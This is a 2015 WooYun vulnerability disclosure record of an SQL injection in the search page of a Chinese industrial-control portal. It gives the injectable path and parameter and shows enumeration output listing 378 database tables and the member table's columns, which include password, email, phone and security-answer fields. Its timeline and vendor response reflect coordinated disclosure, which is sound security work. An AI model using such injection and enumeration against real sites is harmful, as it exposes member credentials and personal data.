漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136361
漏洞标题:中华工控网主站注入(可泄漏大量会员数据)
相关厂商:深圳市技控时代科技有限公司
漏洞作者: 路人甲
提交时间:2015-08-26 15:42
修复时间:2015-10-13 09:50
公开时间:2015-10-13 09:50
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-29: 厂商已经确认,细节仅向厂商公开
2015-09-08: 细节向核心白帽子及相关领域专家公开
2015-09-18: 细节向普通白帽子公开
2015-09-28: 细节向实习白帽子公开
2015-10-13: 细节向公众公开
简要描述:
RT
详细说明:
搜索注入
**.**.**.**/webcast/SearchWebcast.aspx?key=admin
Database: gkong
[378 tables]
+----------------------------------------------------+
| AD_AddCustomerCle |
| Blog_Downloads |
| BusinessCard |
| BusinessLicense |
| ChapterDing |
| CheckRequest |
| Comm_Pingpai_main |
| DataConvert |
| DataConvert_Source |
| Dictionary_CompanyType |
| Dictionary_Occupation |
| Exp_Expert |
| Exp_ExpertType |
| FC_Factory |
| FC_LOG |
| FC_Trademarks |
| FC_User |
| GK_INDEX_INFO |
| GK_SMS |
| GK_SMSHistory |
| GK_TOP10 |
| Gk_Area_Panel |
| GuestBook |
| KeyWordsAd |
| LogoLinks |
| OLC_20 |
| OLC_50 |
| OLC_70 |
| P2PUserOnline |
| SYS_20 |
| SYS_30 |
| SYS_40 |
| SYS_50 |
| SYS_PYTable |
| Sheet1 |
| Sheng |
| SynchronizeTable |
| Temp_Download_A |
| Temp_Download_B |
| Temp_Download_C |
| Temp_Download_D |
| ThirdPartyUser |
| UserAttachment |
| UserScoreYears |
| VIEW_BBS_APPlOGO |
| VIEW_BB_BBS1 |
| VIEW_bb_Topic |
| V_title |
| V_vote |
| View_BookOrder |
| View_IsBlog |
| View_Person_Bbs1_Board |
| View_Person_BbsTopic_Board |
| View_Person_GK_Blog_BlogText |
| tmp-src |
| address_area |
| admin_log |
| admin_option_log |
| arc_dc |
| arc_scbg |
| bb_Address |
| bb_Admin |
| bb_BBS1 |
| bb_BBSLink |
| bb_BBSNews |
| bb_BestTopic |
| bb_Board |
| bb_BoardPermission |
| bb_Bookmark |
| bb_Class |
| bb_Config |
| bb_Friend |
| bb_GroupName |
| bb_LockIP |
| bb_Log |
| bb_Message |
| bb_Message_bak |
| bb_Notice_refuse |
| bb_Notices |
| bb_Online |
| bb_ScoreOperate |
| bb_SmallPaper |
| bb_Topic |
| bb_User |
| bb_UserAccess |
| bb_UserGroups |
| bb_UserScore20081030中午12点 |
| bb_UserScorePerDay |
| bb_UserTitle |
| bb_User_TransmitEmail |
| bb_Vote |
| bb_VoteUser |
| bb_board_trademark |
| bb_download_info |
| bb_medal |
| bb_notdownload |
| bb_topic_info |
| bb_user_mobile |
| bb_user_oauth |
| bb_vip |
| bbs_AppLogo |
| bbs_ExtrScoreLog |
| bbs_blackHouse |
| bbs_hotImages |
| bbs_talk |
| bbs_tuijian |
| blockWords |
| blog_admin |
| blog_blog |
| blog_bloginfo |
| blog_blogteam |
| blog_classname |
| blog_comment |
| blog_filtrate |
| blog_jubao |
| blog_lockip |
| blog_message |
| blog_notdownload |
| blog_skin |
| blog_subject |
| blog_sysskin |
| blog_tag |
| blog_trackback |
| blog_user |
| blog_userskin |
| blog_usertype |
| book_addressList |
| book_class |
| book_gift |
| book_order |
| book_product |
| book_publish |
| bu_message |
| bu_order_goods |
| bu_order_list |
| caa_huiyuandanwei |
| campus_articles |
| campus_login |
| client_Dictionary |
| client_DownloadTable |
| comm_add_dl_pp |
| comm_cs1_dl |
| comm_cs_dl |
| comm_cs_pp |
| comm_dalei |
| comm_pinpai |
| comm_temp_pinpaileibie |
| cp_invite |
| cp_look |
| downloadSort |
| downloads |
| downloads_information |
| dtproperties |
| gk_2394872sadjkflsh_Templates |
| gk_5stars_info |
| gk_Area |
| gk_BBSWeekly |
| gk_Cheap |
| gk_Class |
| gk_Dictionary_Score |
| gk_EmailList |
| gk_EmailSubscribe |
| gk_News_OriginalType |
| gk_OnLineQuestion |
| gk_Sort_Content |
| gk_Subarea |
| gk_SubareaDetail |
| gk_Templates_HTML_Detail |
| gk_Templates_HTML_List |
| gk_Templates_HTML_Url |
| gk_UserInformation |
| gk_UserScore |
| gk_UserScoreTrans |
| gk_UserScoreTrans_2008_2011 |
| gk_UserScoreTrans_today |
| gk_WebCast |
| gk_WebCastLive |
| gk_WebCastQuestion |
| gk_WebCastRegister |
| gk_WebCastSection |
| gk_WebCastTeacher |
| gk_ad |
| gk_ad_date |
| gk_ad_layer |
| gk_admin |
| gk_apply |
| gk_applykey |
| gk_area_improsort |
| gk_area_index |
| gk_bbszt |
| gk_bbsztlist |
| gk_blog_CSTouPiaoRZ |
| gk_blog_CSUser |
| gk_blog_zt |
| gk_blog_zt_sort |
| gk_book |
| gk_column |
| gk_copath |
| gk_diaocha_links |
| gk_edm_link |
| gk_elearn |
| gk_elearn_onlinequestion |
| gk_elearn_teacher |
| gk_exhibit |
| gk_exhibit_column |
| gk_exhibit_info |
| gk_exhibit_links |
| gk_exhibits_wszt |
| gk_exhibits_zt |
| gk_express_user |
| gk_favor |
| gk_feedback |
| gk_field |
| gk_focus |
| gk_focus_tj |
| gk_focus_type |
| gk_gg |
| gk_gkwGroup |
| gk_gkwGroupUsers |
| gk_hotQuestions |
| gk_hot_Keywords |
| gk_index_info_column |
| gk_infobbs |
| gk_intercourse_questionary |
| gk_jianlinpeixun |
| gk_jxsbzzs |
| gk_kandian |
| gk_keywords |
| gk_learn |
| gk_learn_1 |
| gk_lingyu_sort |
| gk_links |
| gk_loginLog |
| gk_lovewall |
| gk_msg_jubao |
| gk_mysearch |
| gk_news |
| gk_news1 |
| gk_news_20100104 |
| gk_news_Templet |
| gk_news_sort |
| gk_oos |
| gk_pinpaileibie |
| gk_pro_series |
| gk_products |
| gk_questionary |
| gk_search_column |
| gk_search_key |
| gk_search_keywords |
| gk_search_log |
| gk_shop |
| gk_solution |
| gk_solution_20100104 |
| gk_sort |
| gk_tuijianchanpin |
| gk_tuijianproducts |
| gk_tuwenbankuai |
| gk_userGroup |
| gk_webCastOnline |
| gk_weblink |
| gk_weekly |
| gk_wenzhai |
| gk_zhuanfang |
| gk_zhuanti |
| gk_zl_ass |
| gk_zt_lanmu |
| gk_ztsort |
| join_corporation |
| leavemess |
| login_log |
| mails_all |
| mails_auto |
| mails_gongkong |
| mails_tlm |
| mn_admin |
| mn_article |
| mn_books |
| mn_critique |
| mn_download |
| mn_infobbs |
| mn_kanhao |
| mn_log_data |
| mn_mans |
| mn_peixun |
| mn_people |
| mn_sec_sort |
| mn_sort |
| mn_sy_wenzhang |
| mn_user |
| op_user |
| rj_education |
| rj_experience |
| rj_infor |
| rj_look |
| rj_peixun |
| school_log |
| school_online |
| search_counter |
| sysconstraints |
| syssegments |
| try_product_intro |
| try_products |
| try_user |
| ty_GuestSay |
| v_user |
| view_BBS_Boards |
| view_BBS_ClassBoard |
| view_Download_List |
| view_INDEX_ALLbbUserScore |
| view_INDEX_Application_Learn |
| view_INDEX_Application_Solution |
| view_INDEX_BBS |
| view_INDEX_BBS_pass |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_Blog |
| view_INDEX_Blog_pass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Business_BBS |
| view_INDEX_Business_Buy |
| view_INDEX_Business_Supply |
| view_INDEX_Download |
| view_INDEX_Download_pass |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Downloads |
| view_INDEX_Enterprise |
| view_INDEX_Enterprise_pass |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Invite |
| view_INDEX_News |
| view_INDEX_News_pass |
| view_INDEX_News_pass_unpass |
| view_INDEX_Product |
| view_INDEX_Product_keywords |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_pass |
| view_INDEX_Product_pass_unpass |
| view_INDEX_SearchKey |
| view_INDEX_Solution |
| view_INDEX_Solution_pass |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_keywords |
| view_MailList_ExpressUser |
| view_MailList_Infor |
| view_MailList_IntercourseQuestionary |
| view_MailList_Questionary |
| view_MailList_bbUser |
| view_SynchronizationBBSTopic |
| view_Templates_Inc_NameCards |
| view_Templates_Inc_NameCards_0 |
| view_Templates_Inc_NameCards_1 |
| view_Templates_Inc_buy_RIGHT |
| view_Templates_Inc_buy_USER |
| view_Templates_Inc_products_RIGHT |
| view_Templates_Inc_products_USER |
| view_Templates_KeyWordsAd_LIST |
| view_Templates_KeyWordsAd_LIST_DETAIL |
| view_Templates_News_Inc_Right_PreviousYears |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_ThisYear |
| view_Templates_News_Inc_Right_ThisYear_Detail |
| view_Templates_News_YYYYMM_LIST |
| view_Templates_News_YYYYMM_LIST_DETAIL |
| view_Templates_News_YYYY_LIST |
| view_Templates_News_YYYY_LIST_DETAIL |
| view_Templates_infobbs_buy |
| view_Templates_news |
| view_Templates_products |
| view_Templates_user |
| view_ThirdPartyUser
| view_bb_topic_info |
| view_bb_user_cn |
| view_solution_index |
| view_solution_index_PageOne |
| web_ad |
| weixin_news |
| 经过北京邮件系统Mailbus发送失败的 |
| 论坛发贴邮箱 |
| gk_jishubu.gk_BBWeekly |
+----------------------------------------------------+
Database: gkong
Table: bb_User
[101 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| addDate | smalldatetime |
| answer | varchar |
| Article | int |
| bbstype | int |
| birthday | varchar |
| ChangeDate | datetime |
| face | varchar |
| height | int |
| homepage | varchar |
| ICQ | varchar |
| Is_ChangeInfo | int |
| l_addr | varchar |
| l_addr_guojia | varchar |
| l_addr_sheng | varchar |
| l_addr_shi | varchar |
| l_addr_xian | varchar |
| l_city | varchar |
| l_college | varchar |
| l_country | varchar |
| l_crm_ExpireTime | datetime |
| l_education | varchar |
| l_face | int |
| l_fax | varchar |
| l_fullname | varchar |
| l_gongkai | int |
| l_grade | int |
| l_hangye | varchar |
| l_info_vip | varchar |
| l_interested | varchar |
| l_intro | text |
| l_jxsbzzs | varchar |
| l_linkman | varchar |
| l_meiti | varchar |
| l_MgUpdateDate | smalldatetime |
| l_mobile | varchar |
| l_occupation | varchar |
| l_paiming | varchar |
| l_parent_company | int |
| l_parent_status | int |
| l_pass | int |
| l_pass_addr | int |
| l_pass_admin | varchar |
| l_pass_company | int |
| l_pass_date | datetime |
| l_pass_email | int |
| l_pass_name | int |
| l_pass_tel | int |
| l_pc | varchar |
| l_products | varchar |
| l_products_count | int |
| l_province | varchar |
| l_quhao | varchar |
| l_sheng | int |
| l_star | int |
| l_tel | varchar |
| l_type | int |
| l_updateDate | smalldatetime |
| l_vip | int |
| l_xingzhi | varchar |
| lastlogin | smalldatetime |
| lockuser | int |
| logins | int |
| mail_verified | bit |
| mobile_verified | bit |
| MSN | varchar |
| Oicq | varchar |
| quesion | varchar |
| reann | varchar |
| Sex | varchar |
| showre | bit |
| sign | ntext |
| title | varchar |
| TitlePic | varchar |
| userclass | varchar |
| usercookies | int |
| userCP | int |
| UserDel | int |
| UserEmail | varchar |
| userEP | int |
| UserGroup | varchar |
| UserGroupID | int |
| UserID | int |
| UserInfo | text |
| UserIsBest | int |
| UserLastIP | varchar |
| UserName | varchar |
| userpassword | varchar |
| UserPhoto | varchar |
| UserPower | int |
| UserSetting | varchar |
| userWealth | int |
| userWealth_2009 | int |
| userWealth_2010 | int |
| userWealth_2011 | int |
| userWealth_2012 | int |
| userWealth_2013 | int |
| userWealth_all | int |
| userWealth_bak | int |
| vip_status | int |
| vip_time | datetime |
| width | int |
+------------------+---------------+
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2015-08-29 09:48
厂商回复:
CNVD确认并复现所述情况,由CNVD通过网站公开联系渠道向其邮件通报.
最新状态:
暂无